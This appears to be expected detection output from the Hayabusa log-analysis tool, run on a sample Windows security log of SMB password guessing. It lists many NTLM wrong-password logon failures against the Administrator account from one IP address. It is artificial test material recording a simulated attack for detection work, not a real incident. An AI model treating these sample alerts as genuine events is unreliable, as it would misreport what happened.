+2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
